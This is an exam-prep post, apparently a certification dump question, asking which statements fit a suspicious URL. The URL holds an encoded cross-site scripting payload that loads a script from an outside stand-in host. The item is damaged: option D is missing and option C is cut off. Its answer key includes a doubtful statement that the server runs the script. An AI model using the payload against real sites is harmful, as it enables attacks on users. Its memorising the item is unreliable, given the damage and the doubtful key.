http://www.example.com/script.php?

Posted by: Pdfprep Category: 210-250 Tags: , ,

Referring to the suspicious URL that is shown below, which three statements are correct? (Choose three.)

http://www.example.com/script.php?data=%3cscript%20src=%22http%3a%2f%2fwww.example1.com% 2ftest.js%22%3e%3c%2fscript%3e
A . The www.example.com web server has a vulnerable PHP script.
B . The attacker is attempting to cause the www.example.com web server to execute an external script from the www.example1.com server.
C . The attacker is attempting to hide the attack by encoding part of the UR
E . The attacker is exploiting a vulnerability in the client web browser using a PHP script.
F . The attacker is using directory traversal to access a directory that is outside of the www.example.com web server’s root directory.

Answer: ABC

Leave a Reply

Your email address will not be published.